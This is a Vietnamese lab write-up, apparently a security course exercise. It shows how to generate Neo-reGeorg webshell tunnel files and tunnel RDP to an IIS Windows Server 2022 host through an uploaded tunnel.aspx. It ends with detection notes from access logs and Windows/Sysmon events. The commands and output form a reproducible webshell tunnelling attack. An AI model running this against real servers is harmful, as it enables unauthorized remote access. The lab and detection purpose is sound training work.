Week 2
Với bài này, em sẽ sử dụng tool https://github.com/L-codes/Neo-reGeorg với webserver IIS trong Winserver 2022.
Test
Đầu tiên, git clone về sau đó install thư viện request
┌──(kali㉿kali)-[~/Desktop/VCS]
└─$ git clone https://github.com/L-codes/Neo-reGeorg.git
Cloning into 'Neo-reGeorg'...
remote: Enumerating objects: 1031, done.
remote: Counting objects: 100% (269/269), done.
remote: Compressing objects: 100% (198/198), done.
remote: Total 1031 (delta 75), reused 73 (delta 71), pack-reused 762 (from 3)
Receiving objects: 100% (1031/1031), 429.46 KiB | 2.04 MiB/s, done.
Resolving deltas: 100% (653/653), done.
┌──(kali㉿kali)-[~/Desktop/VCS]
└─$ cd Neo-reGeorg
┌──(kali㉿kali)-[~/Desktop/VCS/Neo-reGeorg]
└─$ pip install requests requests[socks]
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (2.31.0)
Requirement already satisfied: PySocks!=1.5.7,>=1.5.6 in /usr/lib/python3/dist-packages (from requests[socks]) (1.7.1)Tiến hành tạo file shell để upload lên server với mật khẩu là "trungpq6"
┌──(kali㉿kali)-[~/Desktop/VCS/Neo-reGeorg]
└─$ python neoreg.py generate -k trungpq6
"$$$$$$'' 'M$ '$$$@m
:$$$$$$$$$$$$$$''$$$$'
'$' 'JZI'$$& $$$$'
'$$$ '$$$$
$$$$ J$$$$'
m$$$$ $$$$,
$$$$@ '$$$$_ Neo-reGeorg
'1t$$$$' '$$$$<
'$$$$$$$$$$' $$$$ version 5.2.0
'@$$$$' $$$$'
'$$$$ '$$$@
'z$$$$$$ @$$$
r$$$ $$|
'$$v c$$
'$$v $$v$$$$$$$$$#
$$x$$$$$$$$$twelve$$$@$'
@$$$@L ' '<@$$$$$$$$`
$$ '$$$
[ Github ] https://github.com/L-codes/Neo-reGeorg
[+] Mkdir a directory: neoreg_servers
[+] Create neoreg server files:
=> neoreg_servers/tunnel.jspx
=> neoreg_servers/tunnel.cs
=> neoreg_servers/tunnel.php
=> neoreg_servers/tunnel.aspx
=> neoreg_servers/tunnel.jsp
=> neoreg_servers/tunnel.go
=> neoreg_servers/tunnel.ashxGiả định kẻ tấn công đã có thể upload webshell bằng một cách nào đó
Giờ ta sẽ tiến hành tạo http tunnel tới cổng 3389:
┌──(kali㉿kali)-[~/Desktop/VCS/Neo-reGeorg]
└─$ python neoreg.py -k trungpq6 -u http://192.168.23.100/uploads/tunnel.aspx -p 2706 -t 192.168.23.100:3389
"$$$$$$'' 'M$ '$$$@m
:$$$$$$$$$$$$$$''$$$$'
'$' 'JZI'$$& $$$$'
'$$$ '$$$$
$$$$ J$$$$'
m$$$$ $$$$,
$$$$@ '$$$$_ Neo-reGeorg
'1t$$$$' '$$$$<
'$$$$$$$$$$' $$$$ version 5.2.0
'@$$$$' $$$$'
'$$$$ '$$$@
'z$$$$$$ @$$$
r$$$ $$|
'$$v c$$
'$$v $$v$$$$$$$$$#
$$x$$$$$$$$$twelve$$$@$'
@$$$@L ' '<@$$$$$$$$`
$$ '$$$
[ Github ] https://github.com/L-codes/Neo-reGeorg
+------------------------------------------------------------------------+
Log Level set to [ERROR]
Starting Forward [127.0.0.1:2706] => [192.168.23.100:3389]
Tunnel at:
http://192.168.23.100/uploads/tunnel.aspx
+------------------------------------------------------------------------+
Tiến hành rdp tới 127.0.0.1:2706, ta thấy ta đã rdp thành công vào máy winserver22.
xfreerdp /u:TRUNGPQ6\\Administrator /p:xxxxxxxxx /v:127.0.0.1:2706
[03:23:20:791] [201281:201290] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[03:23:20:791] [201281:201290] [WARN][com.freerdp.crypto] - CN = WIN-7PB89AEMJNR.trungpq6.com
[03:23:20:794] [201281:201290] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[03:23:20:794] [201281:201290] [ERROR][com.freerdp.crypto] - @ WARNING: CERTIFICATE NAME MISMATCH! @
[03:23:20:794] [201281:201290] [ERROR][com.freerdp.crypto] - @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[03:23:20:794] [201281:201290] [ERROR][com.freerdp.crypto] - The hostname used for this connection (127.0.0.1:2706)
[03:23:20:795] [201281:201290] [ERROR][com.freerdp.crypto] - does not match the name given in the certificate:
[03:23:20:795] [201281:201290] [ERROR][com.freerdp.crypto] - Common Name (CN):
[03:23:20:795] [201281:201290] [ERROR][com.freerdp.crypto] - WIN-7PB89AEMJNR.trungpq6.com
[03:23:20:795] [201281:201290] [ERROR][com.freerdp.crypto] - A valid certificate for the wrong name should NOT be trusted!
Certificate details for 127.0.0.1:2706 (RDP-Server):
Common Name: WIN-7PB89AEMJNR.trungpq6.com
Subject: CN = WIN-7PB89AEMJNR.trungpq6.com
Issuer: CN = WIN-7PB89AEMJNR.trungpq6.com
Thumbprint: cb:37:9d:94:01:45:85:6e:0d:6b:5f:84:13:db:bb:c0:1c:66:0e:91:7b:19:cc:af:25:72:a6:77:a0:4f:27:7d
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y
[03:23:30:993] [201281:201290] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:23:30:993] [201281:201290] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[03:23:30:123] [201281:201290] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[03:23:30:124] [201281:201290] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfxDetect
Check access log, ta thấy có rất nhiều request POST tới webshell này
Event id 4624 logon type 10 với source là chính máy winserver.
Sysmon event id 3: w3wp đang kết nối tới port 3389
Last updated
